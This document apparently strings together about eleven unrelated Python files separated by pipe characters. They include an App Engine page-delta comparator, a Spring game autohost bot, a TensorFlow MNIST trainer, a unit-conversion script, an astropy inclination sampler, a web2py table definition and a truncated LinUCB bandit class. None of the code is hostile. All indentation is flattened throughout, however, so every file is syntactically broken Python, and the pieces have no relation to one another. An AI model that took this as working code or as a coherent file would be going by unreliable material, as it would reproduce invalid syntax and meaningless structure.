# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Compares page data sent from the client.
This file contains handlers that are used to run data comparisons.
"""
import math
from django.utils import simplejson
from google.appengine.api import taskqueue
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from models import data_list
from models import page_data
from models import page_delta
from models import screenshot
COMPUTE_DELTA_URL = '/compute_delta'
COMPUTE_DELTA_BY_PART_URL = '/compute_delta_by_part'
COMPUTE_SCORE_URL = '/compute_score'
class ComputeDeltaHandler(webapp.RequestHandler):
"""Handler for computing a page delta."""
# Disable 'Invalid method name' lint error.
# pylint: disable-msg=C6409
def get(self):
"""Compares a page delta based on the given delta key."""
delta_key = self.request.get('delta')
if delta_key:
delta = db.get(db.Key(delta_key))
else:
delta = self.FindPairToCompare()
if delta:
self.AddCompareTasksToQueue(delta)
else:
self.response.out.write('No data to compare.')
def FindPairToCompare(self):
"""Finds a pair of data to compare if exits.
If it finds a pair of data, it will mark entry from the test browser as
already compared (in a transaction) and then create and save a new delta
entry and return it.
Returns:
The delta entry if there's a pair to compare. None otherwise.
"""
uncompared_test_data = page_data.PageData.all().filter(
'is_reference =', False).filter('compared =', False)
for test_data in uncompared_test_data:
if not test_data.IsReady():
continue
try:
suite = test_data.test_suite
except db.Error:
continue
ref_data = page_data.PageData.all().filter(
'test_suite =', suite).filter(
'site =', test_data.site).filter(
'is_reference =', True).get()
if ref_data:
test_data_key = str(test_data.key())
# Function to run in a transaction. Returns True if the data is good
# to be compared; returns False if it has already been marked as
# compared by some other requests.
def MarkDataAsCompared():
# Re-fetch and double check if the data hasn't been compared to avoid
# concurrency problems.
data = db.get(db.Key(test_data_key))
if not data.compared:
test_data.compared = True
test_data.put()
return True
else:
return False
if db.run_in_transaction(MarkDataAsCompared):
delta = page_delta.PageDelta()
delta.test_data = test_data
delta.ref_data = ref_data
delta.test_browser = test_data.browser
delta.test_browser_channel = test_data.browser.channel
delta.ref_browser = ref_data.browser
delta.ref_browser_channel = ref_data.browser.channel
if test_data.metadata:
delta.test_data_metadata = test_data.metadata
if ref_data.metadata:
delta.ref_data_metadata = ref_data.metadata
delta.test_suite = test_data.test_suite
delta.compare_key = page_delta.GetOrInsertUniqueKey(
delta.GetTestBrowser().key().name(),
delta.GetRefBrowser().key().name(), delta.GetSiteUrl())
delta.delta = data_list.CreateEmptyDataList()
delta.dynamic_content = data_list.CreateEmptyDataList()
# This is hack to work around screenshot blobstore missing issue.
self.SetScreenshotKeyUsingPageDataRef(test_data)
self.SetScreenshotKeyUsingPageDataRef(ref_data)
delta.put()
return delta
return None
def AddCompareTasksToQueue(self, delta):
"""Adds a task to the task queue to compute the given delta.
Each task computes one part of the layout.
Args:
delta: A PageDelta object to add to the task queue.
"""
delta_key = str(delta.key())
task_url = '/compute_delta_by_part'
for i in range(data_list.NUM_ENTRIES):
task_params = {'deltaKey': delta_key,
'part': i}
taskqueue.add(url=task_url, params=task_params, method='GET')
self.response.out.write('Tasks added. key=%s' % delta_key)
def SetScreenshotKeyUsingPageDataRef(self, pd):
"""Adds a screenshot blobstore key to page data model(if missing).
This is a hack for screenshot key missing issue for page_data model.
Args:
pd: A PageData object to check if screenshot is missing.
"""
if not pd.screenshot:
pd_screenshot = screenshot.Screenshot.all(keys_only=True).filter(
'pagedata_ref =', str(pd.key())).get()
if pd_screenshot:
pd.screenshot = pd_screenshot
pd.put()
class ComputeDeltaByPart(webapp.RequestHandler):
"""Handler for computing a page delta based on part of the page."""
# Disable 'Invalid method name' lint error.
# pylint: disable-msg=C6409
def get(self):
"""Compares a page delta by part based on the given delta key and part."""
delta_key = self.request.get('deltaKey')
part = int(self.request.get('part'))
delta = db.get(db.Key(delta_key))
if delta.test_data.layout_table:
dl = []
ignoredContent = []
nt1 = delta.test_data.GetNodesTable()
nt2 = delta.ref_data.GetNodesTable()
# Let's initialize dynamicContentTable.
dynamic_content_table_test = None
dynamic_content_table_ref = None
if delta.test_data.dynamic_content_table:
dynamic_content_table_test = simplejson.loads(
delta.test_data.dynamic_content_table)
if delta.ref_data.dynamic_content_table:
dynamic_content_table_ref = simplejson.loads(
delta.ref_data.dynamic_content_table)
rows1 = delta.test_data.layout_table.GetEntryData(part)
rows2 = delta.ref_data.layout_table.GetEntryData(part)
part_length = int(math.ceil(delta.test_data.height /
float(data_list.NUM_ENTRIES)))
for i in range(min(len(rows1), len(rows2))):
for j in range(min(len(rows1[i]), len(rows2[i]))):
try:
nid1 = int(rows1[i][j])
nid2 = int(rows2[i][j])
except ValueError:
nid1 = int(rows1[i][j].split()[0])
nid2 = int(rows2[i][j].split()[0])
if nid1 < 0 or nid2 < 0:
continue
# If element is marked as dynamic content then add it to
# ignoredContent and continue.
if ((dynamic_content_table_test and
(nid1 in dynamic_content_table_test)) or
(dynamic_content_table_ref and
(nid2 in dynamic_content_table_ref))):
x = j
y = i + part * part_length
ignoredContent.append((x, y, nid1, nid2))
continue
try:
node1 = nt1[nid1]
node2 = nt2[nid2]
except IndexError:
continue
if not AreNodesSame(node1, node2):
x = j
y = i + part * part_length
dl.append((x, y, nid1, nid2))
delta.delta.AddEntry(part, dl)
delta.dynamic_content.AddEntry(part, ignoredContent, True)
if delta.delta.EntriesReady():
task_params = {'deltaKey': delta_key}
taskqueue.add(url='/compute_score', params=task_params, method='GET')
else:
self.response.out.write('Tasks %d finished.' % part)
class ComputeScore(webapp.RequestHandler):
"""Computes the score of a given delta after all parts are finished.
Also deletes the layout table of the original test data entry to save space.
Handler also calculates various element count and create indices necessary.
"""
# Disable 'Invalid method name' lint error.
# pylint: disable-msg=C6409
def get(self):
key = self.request.get('deltaKey')
result = db.get(db.Key(key))
if result.score < 0:
result.ComputeScore()
result.test_data.DeleteLayoutTable()
result.CreateIndices()
result.CalculateElemCount()
self.response.out.write('Done.')
def AreNodesSame(node_data_1, node_data_2):
"""Compares if two nodes are the same.
Currently using a very basic algorithm: assume the nodes are the same if
either their XPaths are the same or their dimension/positions are the same.
Args:
node_data_1: A dictionary of values about a DOM node.
node_data_2: A dictionary of values about a DOM node.
Returns:
A boolean indicating whether the two nodes should be considered equivalent.
"""
return (node_data_1['p'].lower() == node_data_2['p'].lower() or
(node_data_1['w'] == node_data_2['w'] and
node_data_1['h'] == node_data_2['h'] and
node_data_1['x'] == node_data_2['x'] and
node_data_1['y'] == node_data_2['y']))
application = webapp.WSGIApplication(
[(COMPUTE_DELTA_URL, ComputeDeltaHandler),
(COMPUTE_DELTA_BY_PART_URL, ComputeDeltaByPart),
(COMPUTE_SCORE_URL, ComputeScore)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
import commands
import thread
import signal
import os
import time
import subprocess
import platform
import sys
import traceback
import glob
if platform.system() == "Windows":
import win32api
from tasbot.utilities import *
from tasbot.plugin import IPlugin
import udpinterface
def addorreplace(scripttxt, key, value):
s1 = scripttxt.find(key + "=")
if s1 >= 0: # replace existing line
s2 = scripttxt.find(";", s1) + 1
return scripttxt.replace(scripttxt[s1:s2],"%s=%s;" % (key, value), 1)
# add new entry at top of file
index = scripttxt.find('{') + 1
return scripttxt[:index] +"\n\t%s=%s;\n" %(key, value) + scripttxt[index:]
class Main(IPlugin):
def __init__(self,name,tasclient):
IPlugin.__init__(self,name,tasclient)
self.sock = self.tasclient.socket
self.app = None
self.hosted = 0
self.battleowner = ""
self.battleid = 0
self.status = 0
self.pr = 0
self.noowner = True
self.script = ""
self.used = 0
self.hosttime = 0.0
self.redirectjoins = False
self.gamestarted = False
if platform.system() == "Windows":
self.scriptbasepath = os.environ['USERPROFILE']
else:
self.scriptbasepath = os.environ['HOME']
self.redirectspring = False
self.redirectbattleroom = False
self.users = dict()
self.logger.debug( "INIT MoTH" )
self.engineversion = ""
self.u = None
def ecb(self,event,data):
if self.redirectspring:
ags = []
data2 = ""
for c in data:
if ord(c) < 17:
ags.append(ord(c))
else:
data2 += c
self.saypm(self.battleowner,"#"+str(event)+"#".join(ags)+" "+data2)
def onloggedin(self,socket):
self.hosted = 0
self.sock = socket
def mscb(self,p,msg):
try:
if p == self.battleowner:
if msg.startswith("!"):
self.u.sayingame("/"+msg[1:])
except Exception, e:
self.logger.exception(e)
exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
self.sayex("*** EXCEPTION: BEGIN")
for line in exc:
self.sayex(line)
self.sayex("*** EXCEPTION: END")
def killbot(self):
self.logger.info( "setting force_quit True" )
self.app.dying = True
self.u.running = False
def timeoutthread(self):
while 1:
time.sleep(20.0)
try:
if not ( not self.noowner and self.hosted == 1) and not self.gamestarted:
self.logger.error("Timeouted hosting")
self.killbot()
return
except Exception,e:
self.logger.debug('hosting timeout')
self.logger.exception(e)
def getspringded(self, enginever):
ver = os.path.basename(enginever)
res = self.app.config.get('tasbot', 'springdedpath').replace("{ENGINEVER}", ver)
if os.path.isfile(res) and os.access(res, os.X_OK):
return res
return ""
def getenginelist(self):
vers = glob.glob(self.app.config.get('tasbot', 'springdedpath').split("{ENGINEVER}")[0] + "*")
res = []
for ver in vers:
if not os.path.isdir(ver):
continue
name = os.path.basename(ver)
if not self.getspringded(name):
continue
res.append(name)
return sorted(res)
def startspring(self,socket,g):
currentworkingdir = os.getcwd()
try:
self.u.reset()
if self.gamestarted:
socket.send("SAYBATTLEEX *** Error: game is already running\n")
return
self.output = ""
socket.send("SAYBATTLEEX *** Starting game...\n")
socket.send("MYSTATUS 1\n")
st = time.time()
#status,j = commands.getstatusoutput("spring-dedicated "+os.path.join(self.scriptbasepath,"%f.txt" % g ))
springded = self.getspringded(self.engineversion)
scripttxt = os.path.join(self.scriptbasepath,"%f.txt" % g )
self.sayex('*** Starting spring: command line "%s %s"' % (springded, scripttxt))
if self.app.config.has_option('tasbot', "springdatapath"):
springdatapath = self.app.config.get('tasbot', "springdatapath")
if not springdatapath in sys.path:
sys.path.append(springdatapath)
os.chdir(springdatapath)
else:
springdatapath = None
if springdatapath!= None:
os.environ['SPRING_DATADIR'] = springdatapath
self.pr = subprocess.Popen((springded, scripttxt),stdout=subprocess.PIPE,stderr=subprocess.STDOUT,cwd=springdatapath)
self.gamestarted = True
l = self.pr.stdout.readline()
while len(l) > 0:
self.output += l
l = self.pr.stdout.readline()
status = self.pr.wait()
self.sayex("*** Spring has exited with status %i" % status )
et = time.time()
if status != 0:
socket.send("SAYBATTLEEX *** Error: Spring Exited with status %i\n" % status)
g = self.output.split("\n")
for h in g:
self.sayex("*** STDOUT+STDERR: "+h)
time.sleep(float(len(h))/900.0+0.05)
socket.send("MYSTATUS 0\n")
socket.send("SAYBATTLEEX *** Game ended\n")
except Exception,e:
exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
self.sayex("*** EXCEPTION: BEGIN")
for line in exc:
self.sayex(line)
self.sayex("*** EXCEPTION: END")
try:
if int(self.app.config.get('autohost', "keepscript")) == 0:
os.remove(os.path.join(self.scriptbasepath,"%f.txt" % g))
except Exception,e:
self.logger.debug('failed to remove script')
os.chdir(currentworkingdir)
self.gamestarted = False
if self.noowner == True:
self.sayex("The host is no longer in the battle, exiting")
self.logger.info("Exiting")
self.killbot()
def onload(self,tasc):
try:
self.tasclient = tasc
self.app = tasc.main
self.hosttime = time.time()
self.start_thread(self.timeoutthread)
if not self.u:
self.u = udpinterface.UDPint(int(self.app.config.get('autohost', "ahport")),self.mscb,self.ecb)
except Exception, e:
self.logger.exception(e)
def oncommandfromserver(self,command,args,s):
#print "From server: %s | Args : %s" % (command,str(args))
self.sock = s
if command == "RING" and len(args) > 0:
s.send("RING " + self.app.config.get('autohost', "spawnedby") + "\n")
if command == "CLIENTBATTLESTATUS" and len(args) > 0 and self.redirectbattleroom:
self.saypm(self.app.config.get('autohost', "spawnedby"), "!" + command + " " + " ".join(args[0:]) )
if command == "SAIDBATTLE" and len(args) > 0:
if self.redirectbattleroom:
self.saypm(self.app.config.get('autohost', "spawnedby"), "!" + command + " " + " ".join(args[0:]))
if args[1].startswith("!") and args[0] == self.battleowner:
try:
msg = " ".join(args[1:])
self.u.sayingame("/"+msg[1:])
except Exception,e:
exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
self.sayex("*** EXCEPTION: BEGIN")
for line in exc:
self.sayex(line)
if command == "SAIDBATTLEEX" and len(args) > 0 and self.redirectbattleroom:
self.saypm(self.app.config.get('autohost', "spawnedby"), "!" + command + " " + " ".join(args[0:]))
if command == "REQUESTBATTLESTATUS":
s.send( "MYBATTLESTATUS 4194816 255\n" )#spectator+synced/white
if command == "SAIDPRIVATE" and args[0] not in self.app.config.get('autohost', "bans") and args[0] == self.app.config.get('autohost', "spawnedby"):
if args[1] == "!openbattle":
if self.hosted == 1:
self.saypm(args[0],"E1 | Battle is already hosted")
return
if len(args) < 6:
self.logger.error("Got invalid openbattle with params:" + " ".join(args))
return
# last arg / first tab
engineversion = " ".join(args).split("\t")[1]
ded = self.getspringded(engineversion)
if not ded:
self.logger.error("Invalid engine version received:" + engineversion)
self.saypm(args[0], "Engine version %s isn't installed on the relayhost. Available versions are: " %(engineversion))
for ver in self.getenginelist():
self.saypm(args[0], ver)
return
self.logger.info("Using version %s for hosting" %(engineversion))
self.engineversion = engineversion
args[5] = self.app.config.get('autohost',"hostport")
self.logger.info("OPENBATTLE "+" ".join(args[2:]))
s.send("OPENBATTLE "+" ".join(args[2:])+"\n")
self.battleowner = args[0]
return
elif args[1] == "!supportscriptpassword":
self.redirectjoins = True
return
elif self.hosted == 1 and args[0] == self.battleowner:
if args[1] == "!setingamepassword":
try:
msg = " ".join(args[2:])
self.u.sayingame("/adduser "+msg)
except Exception,e:
exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
self.sayex("*** EXCEPTION: BEGIN")
for line in exc:
self.sayex(line)
if args[1] == "!addstartrect":
s.send("ADDSTARTRECT "+" ".join(args[2:])+"\n")
if args[1] == "!setscripttags":
s.send("SETSCRIPTTAGS "+" ".join(args[2:])+"\n")
if args[1] == "!removestartrect":
s.send("REMOVESTARTRECT "+" ".join(args[2:])+"\n")
if args[1] == "!leavebattle":
s.send("LEAVEBATTLE\n")
self.hosted = 0
if args[1] == "!updatebattleinfo":
s.send("UPDATEBATTLEINFO "+" ".join(args[2:])+"\n")
if args[1] == "!kickfrombattle":
s.send("KICKFROMBATTLE "+" ".join(args[2:])+"\n")
if args[1] == "!addbot":
s.send("ADDBOT "+" ".join(args[2:])+"\n")
if args[1] == "!handicap":
s.send("HANDICAP "+" ".join(args[2:])+"\n")
if args[1] == "!forceteamcolor":
s.send("FORCETEAMCOLOR "+" ".join(args[2:])+"\n")
if args[1] == "!forceallyno":
s.send("FORCEALLYNO "+" ".join(args[2:])+"\n")
if args[1] == "!forceteamno":
s.send("FORCETEAMNO "+" ".join(args[2:])+"\n")
if args[1] == "!disableunits":
s.send("DISABLEUNITS "+" ".join(args[2:])+"\n")
if args[1] == "!enableallunits":
s.send("ENABLEALLUNITS "+" ".join(args[2:])+"\n")
if args[1] == "!removebot":
s.send("REMOVEBOT "+" ".join(args[2:])+"\n")
if args[1] == "!updatebot":
s.send("UPDATEBOT "+" ".join(args[2:])+"\n")
if args[1] == "!ring":
s.send("RING "+" ".join(args[2:])+"\n")
if args[1] == "!forcespectatormode":
s.send("FORCESPECTATORMODE "+" ".join(args[2:])+"\n")
if args[1] == "!redirectspring" and len(args) > 1:
try:
if ( self.tasclient.users[self.battleowner].bot ):
self.redirectspring = bool(args[2])
except Exception,e:
exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
self.sayex("*** EXCEPTION: BEGIN")
for line in exc:
self.sayex(line)
self.sayex("*** EXCEPTION: END")
if args[1] == "!redirectbattleroom"and len(args) > 1:
try:
if ( self.tasclient.users[self.battleowner].bot ):
self.redirectbattleroom = bool(args[2])
except Exception,e:
exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
self.sayex("*** EXCEPTION: BEGIN")
for line in exc:
self.sayex(line)
self.sayex("*** EXCEPTION: END")
if args[1] == "!cleanscript":
self.script = ""
if args[1] == "!appendscriptline":
self.script += " ".join(args[2:])+"\n"
if args[1].startswith("#") and args[0] == self.battleowner:
try:
msg = " ".join(args[1:])
self.u.sayingame(msg[1:])
except Exception,e:
exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
self.sayex("*** EXCEPTION: BEGIN")
for line in exc:
self.sayex(line)
if args[1] == "!saybattle":
s.send("SAYBATTLE "+" ".join(args[2:])+"\n")
if args[1] == "!saybattleex":
s.send("SAYBATTLEEX "+" ".join(args[2:])+"\n")
if args[1] == "!startgame":
if not self.gamestarted:
s.send("MYSTATUS 1\n")
g = time.time()
try:
os.remove(os.path.join(self.scriptbasepath,"%f.txt" % g))
except Exception,e:
pass
f = open(os.path.join(self.scriptbasepath,"%f.txt" % g),"a")
self.script = addorreplace(self.script, "HostPort", self.app.config.get('autohost', 'hostport'))
self.script = addorreplace(self.script, "MyPlayerName", self.app.config.get('tasbot', "nick"))
self.script = addorreplace(self.script, "AutoHostPort", self.app.config.get('autohost', "ahport"))
if self.app.config.has_option('autohost', "bindip"):
self.script = addorreplace(self.script,"HostIP", self.app.config.get('autohost', "bindip"))
f.write(self.script)
f.close()
thread.start_new_thread(self.startspring,(s,g))
else:
self.saypm(args[0],"E3 | Battle already started")
else:
self.saypm(args[0],"E2 | Battle is not hosted")
if command == "OPENBATTLE":
self.battleid = int(args[0])
self.used = 1
self.sayex("Battle hosted succesfully , id is %s" % args[0])
if command == "JOINEDBATTLE" and len(args) >= 2 and int(args[0]) == self.battleid:
if args[1] == self.battleowner:
self.hosted = 1
self.noowner = False
self.sayex("The host has joined the battle")
s.send("SAYBATTLE Hello, the bot accepts all commands from normal spring prefixed with ! instead of /\n")
s.send("SAYBATTLE read Documentation/cmds.txt for a list of spring commands\n")
s.send("SAYBATTLE in order to stop a game immediately, use !kill\n")
if self.redirectjoins:
self.saypm(self.battleowner,command + " " + " ".join(args[0:])) # redirect the join command to the owner so he can manage script password
if command == "SERVERMSG":
self.saypm(self.battleowner," ".join(args))
if command == "LEFTBATTLE" and int(args[0]) == self.battleid and args[1] == self.battleowner:
if not self.gamestarted:
self.sayex("The host has left the battle and the game isn't running, exiting")
s.send("LEAVEBATTLE\n")
try:
if platform.system() == "Windows":
handle = win32api.OpenProcess(1, 0, self.pr.pid)
win32api.TerminateProcess(handle, 0)
else:
os.kill(self.pr.pid,signal.SIGKILL)
except Exception,e:
pass
self.killbot()
self.noowner = True
if command == "REMOVEUSER" and args[0] == self.battleowner:
if not self.gamestarted:
self.sayex("The host disconnected and game not started, exiting")
try:
if platform.system() == "Windows":
handle = win32api.OpenProcess(1, 0, self.pr.pid)
win32api.TerminateProcess(handle, 0)
else:
os.kill(self.pr.pid,signal.SIGKILL)
except Exception,e:
pass
self.killbot()
self.noowner = True
def onloggedin(self,socket):
self.noowner = True
self.hosted = 0
if self.gamestarted:
socket.send("MYSTATUS 1\n")
def saypm(self,p,m):
try:
self.logger.debug("PM To:%s, Message: %s" %(p,m))
self.tasclient.socket.send("SAYPRIVATE %s %s\n" %(p,m))
except Exception, e:
self.logger.exception(e)
def say(self,m):
try:
self.logger.debug("SAY autohost %s\n" % m)
self.tasclient.socket.send("SAY autohost %s\n" % m)
except Exception, e:
self.logger.exception(e)
def sayex(self,m):
try:
self.logger.debug("SAYEX autohost %s\n" % m)
self.tasclient.socket.send("SAYEX autohost %s\n" % m)
except Exception, e:
self.logger.exception(e)
|
"""
Geonomics Help (:mod:`geonomics.help`)
======================================
.. currentmodule:: geonomics.help
Memory Help
-----------
get_obj_size Get the full size of a complex object
Parameters Help
---------------
plot_movement Plot example movement tracks generated by the input
movement parameters
Background information
----------------------
Geonomics models can occupy a lot of memory, and also contain a large number of
parameters to be customized. The functions in this module aim to provide some
assistance in assessing Geonomics' behavior, so as to help users better plan,
introspect, and debug their models.
"""
from ._param_help import *
from ._memory_help import *
|
import pytest
pytestmark = pytest.mark.asyncio
async def test_main():
assert True
|
# This file contains functions for training a TensorFlow model
import tensorflow as tf
import numpy as np
import os
MODEL_DIR = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'models'
)
def load_data():
mnist = tf.keras.datasets.mnist
(x_train, y_train),(x_test, y_test) = mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train = np.reshape(x_train, (-1, 1, 28, 28))
x_test = np.reshape(x_test, (-1, 1, 28, 28))
return x_train, y_train, x_test, y_test
def build_model():
# Create the keras model
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.InputLayer(input_shape=[1, 28, 28], name="InputLayer"))
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(512))
model.add(tf.keras.layers.Activation(activation=tf.nn.relu6, name="ReLU6"))
model.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax, name="OutputLayer"))
return model
def train_model():
# Build and compile model
model = build_model()
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# Load data
x_train, y_train, x_test, y_test = load_data()
# Train the model on the data
model.fit(
x_train, y_train,
epochs = 10,
verbose = 1
)
# Evaluate the model on test data
test_loss, test_acc = model.evaluate(x_test, y_test)
print("Test loss: {}\nTest accuracy: {}".format(test_loss, test_acc))
return model
def maybe_mkdir(dir_path):
if not os.path.exists(dir_path):
os.makedirs(dir_path)
def save_model(model):
output_names = model.output.op.name
sess = tf.keras.backend.get_session()
graphdef = sess.graph.as_graph_def()
frozen_graph = tf.graph_util.convert_variables_to_constants(sess, graphdef, [output_names])
frozen_graph = tf.graph_util.remove_training_nodes(frozen_graph)
# Make directory to save model in if it doesn't exist already
maybe_mkdir(MODEL_DIR)
model_path = os.path.join(MODEL_DIR, "trained_lenet5.pb")
with open(model_path, "wb") as ofile:
ofile.write(frozen_graph.SerializeToString())
if __name__ == "__main__":
model = train_model()
save_model(model)
|
#km hm dam m dm cm mm
medida=float(input('digite a medida em metros : '))
dm=medida*10
cm=medida*100
mm=medida*1000
dam=medida/10
hm=medida/100
km=medida/1000
print("""
a converção de metros para dm é {:.1f}
a converção de metros para cm é {:.1f}
a converção de metros para mm é {:.1f}
a converção de metros para dam é {:.1f}
a converção de metros para hm é {:.1f}
a converção de metros para km é {:.1f}""".format(dm,cm,mm,dam,hm,km))
|
import numpy as np
from astropy.table import Table
from astropy.io import ascii
deg = np.pi/180.0
# np.random.seed(42)
np.random.seed(43)
N_systems = 10
# let's get a sample of uniformly oriented disks in 3D space
# Generate randomly oriented momentum vector on the sky.
U = np.random.uniform(size=N_systems)
V = np.random.uniform(size=N_systems)
# spherical coordinates for angular momentum vector, uniformly distributed.
i_disks = np.arccos(2 * V - 1.0) / deg # polar angle
Omega_disks = 2 * np.pi * U / deg # azimuth
def calc_theta(i_disk, Omega_disk, i_star, Omega_star):
'''
Calculate the mutual inclination between two planes. Assumes all inputs in degrees.
'''
cos_theta = np.cos(i_disk * deg) * np.cos(i_star * deg) + np.sin(i_disk * deg) * np.sin(i_star * deg) * np.cos((Omega_disk - Omega_star) * deg)
theta = np.arccos(cos_theta)/deg
return theta
# Rejection sampling for the distributions
def input_prob(theta):
'''
theta is in degrees.
'''
return np.sin(theta * deg) * np.exp(-0.5 * (theta - 5.0)**2 / (2**2))
def propose_prob(theta):
'''
theta is in degrees.
'''
return np.exp(-0.5 * (theta - 5.0)**2/(2**2))
# proposed values
theta_props = np.random.normal(loc=5.0, scale=2.0, size=100000)
# since we know that the mutual inclination must be between 0 and 180, let's get rid of any values on the tail
# of the Gaussian that exceed these ranges
theta_props = theta_props[(theta_props > 0.0) & (theta_props < 180.0)]
# Evaluate the probability of Q for all samples
Qs = propose_prob(theta_props)
# Generate a random number [0, Q(Delta I)] for all samples
us = np.random.uniform(low=0, high=Qs)
# Evaluate p(Delta I) for all samples
Ps = input_prob(theta_props)
# Keep the samples for which u <= P
theta_samples = theta_props[us <= Ps]
thetas = np.random.choice(theta_samples, size=N_systems) # degrees
phis = np.random.uniform(low=0, high=360., size=N_systems) # degrees
def P_x(xi):
'''
Calculate the transformation matrix about the X-axis. Assumes the angle is in degrees.
'''
x = xi * deg
return np.array([[1, 0, 0], [0, np.cos(x), -np.sin(x)], [0, np.sin(x), np.cos(x)]])
def P_z(xi):
'''
Calculate the transformation matrix about the Z-axis. Assumes angle is in degrees.
'''
x = xi * deg
return np.array([[np.cos(x), -np.sin(x), 0], [np.sin(x), np.cos(x), 0], [0, 0, 1]])
def get_xyz(theta, phi):
'''
Convert angles in the disk frame into x, y, z in the disk frame. All angles in degrees.
'''
return np.array([np.sin(theta * deg) * np.cos(phi * deg), np.sin(theta * deg) * np.sin(phi * deg), np.cos(theta * deg)])
def get_binary_parameters(i_disk, Omega_disk, theta, phi):
'''
Using the matrix math above, calculate i_star and Omega_star. Assumes all angles are in degrees.
'''
xyz = get_xyz(theta, phi)
res = np.dot(P_z(-Omega_disk).T, np.dot(P_x(i_disk).T, xyz))
X, Y, Z = res
i_star = np.arccos(Z)/deg
Omega_star = np.arctan2(Y, X)/deg - 90.0
# the -90 is because the projection of the angular momentum vector on the X-Y plane
# is not the same as the ascending node. There is a 90 degree offset between the two.
return i_star, Omega_star
i_stars = np.empty(N_systems, np.float64) # degrees
Omega_stars = np.empty(N_systems, np.float64) # degrees
for i in range(N_systems):
i_stars[i], Omega_stars[i] = get_binary_parameters(i_disks[i], Omega_disks[i], thetas[i], phis[i]);
# calculate the uncertainty assuming 1 degree and save this too
# we'll assume that the uncertainties on the fake data are a degree for both the disk and the binary
# and the error is on cos_i()
sd_disks = np.sin(i_disks * deg) * 1.0 * deg
sd_stars = np.sin(i_stars * deg) * 1.0 * deg
# compute the mutual inclination of these too, and add it as a column
# for fun, also store the phi column, since our posterior will have it
low_sample = Table([np.cos(i_disks * deg), sd_disks, Omega_disks, np.cos(i_stars * deg), sd_stars, Omega_stars, thetas, phis], names=["cos_i_disk", "cos_i_disk_err", "Omega_disk", "cos_i_star", "cos_i_star_err", "Omega_star", "theta", "phi"])
ascii.write(low_sample, "data/low_sample.ecsv", format="ecsv")
|
class Solution:
def canCompleteCircuit(self, gas, cost):
start = 0
deficit = 0
tank = 0
for i, (g, c) in enumerate(zip(gas, cost)):
tank += g - c
if tank < 0:
start = i + 1
deficit -= tank
tank = 0
return start if tank >= deficit else -1
|
# -*- coding: utf-8 -*-
dh.define_table('article',
Field('article_uuid', type='string',
length=36,
#default=uuid4(),
required=True,
requires=IS_NOT_EMPTY(),
notnull=True,
unique=True,
label='Article ID',
#comment=None,
writable=False,
readable=True,
update=None),
Field('ref_author', dh.author,
length=None,
#default=None,
required=True,
requires=IS_NOT_EMPTY(),
notnull=True,
unique=False,
label='Author',
#comment=None,
writable=True,
readable=True,
update=None),
Field('author_date', type='datetime',
length=None,
#default=datetime.utcnow(),
required=False,
#requires=IS_NOT_EMPTY(),
notnull=False,
unique=False,
label='Author Date',
#comment=None,
writable=True,
readable=True,
update=None),
Field('description', type='string',
length=255,
default=None,
required=False,
#requires=IS_NOT_EMPTY(),
notnull=False,
unique=False,
label='Description',
comment='This field is only for META Description of the article.',
writable=True,
readable=True,
update=None),
Field('meta_keys', type='string',
length=255,
default=None,
required=False,
#requires=IS_NOT_EMPTY(),
notnull=False,
unique=False,
label='Keywords',
comment='This field is only for META Keywords for the article.',
writable=True,
readable=True,
update=None),
Field('publish_after', type='datetime',
length=None,
#default=datetime.utcnow(),
required=False,
#requires=IS_NOT_EMPTY(),
notnull=False,
unique=False,
label='Publish After',
comment='The article will only appear if the current date equals or exceeds this timestamp.',
writable=True,
readable=True,
update=None),
Field('active_state', type='integer',
length=None,
default=1,
required=True,
requires=IS_INT_IN_RANGE(-1, 2),
notnull=True,
unique=False,
label='Status',
comment='-1:Blacklisted; 0:Inactive; 1:Active;',
writable=True,
readable=True,
update=None),
Field('cdate', type='datetime',
length=None,
#default=datetime.utcnow(),
required=True,
requires=IS_NOT_EMPTY(),
notnull=True,
unique=False,
label='Create Date',
#comment=None,
writable=False,
readable=True,
update=None),
Field('mdate', type='datetime',
length=None,
#default=datetime.utcnow(),
required=True,
requires=IS_NOT_EMPTY(),
notnull=True,
unique=False,
label='Last Modified',
#comment=None,
writable=False,
readable=False,
#update=datetime.utcnow()),
),
Field('is_deleted', type='boolean',
length=None,
default=False,
required=False,
#requires=IS_NOT_EMPTY(),
notnull=False,
unique=False,
#label='Deleted',
#comment=None,
writable=False,
readable=False,
update=None),
migrate=True)
|
from fireo.fields import TextField, IDField, DateTime
from fireo.models import Model
from datetime import datetime
def test_fix_issue_77():
class UserIssue77(Model):
name = TextField()
created_on = DateTime(auto=True)
UserIssue77.collection.create(name="Azeem")
UserIssue77.collection.create(namae="Haider")
UserIssue77.collection.create(name="Arfan")
users = UserIssue77.collection.filter("created_on", "<=", datetime.now()).fetch(2)
for user in users:
assert user.key is not None
c = users.cursor
assert c is not None
user_list = UserIssue77.collection.cursor(c).fetch()
for user in user_list:
assert user.key is not None
|
import os
import pickle
import numpy as np
from numba import jit
from .ucb import UCB
@jit(nopython=True)
def calc_confidence_multiplier(confidence_scaling_factor, approximator_dim, iteration, bound_features,
reg_factor, delta):
return confidence_scaling_factor * np.sqrt(approximator_dim * np.log(
1 + iteration * bound_features ** 2 / (reg_factor * approximator_dim)) + 2 * np.log(1 / delta))
class LinUCB(UCB):
"""Linear UCB.
"""
def __init__(self,
bandit,
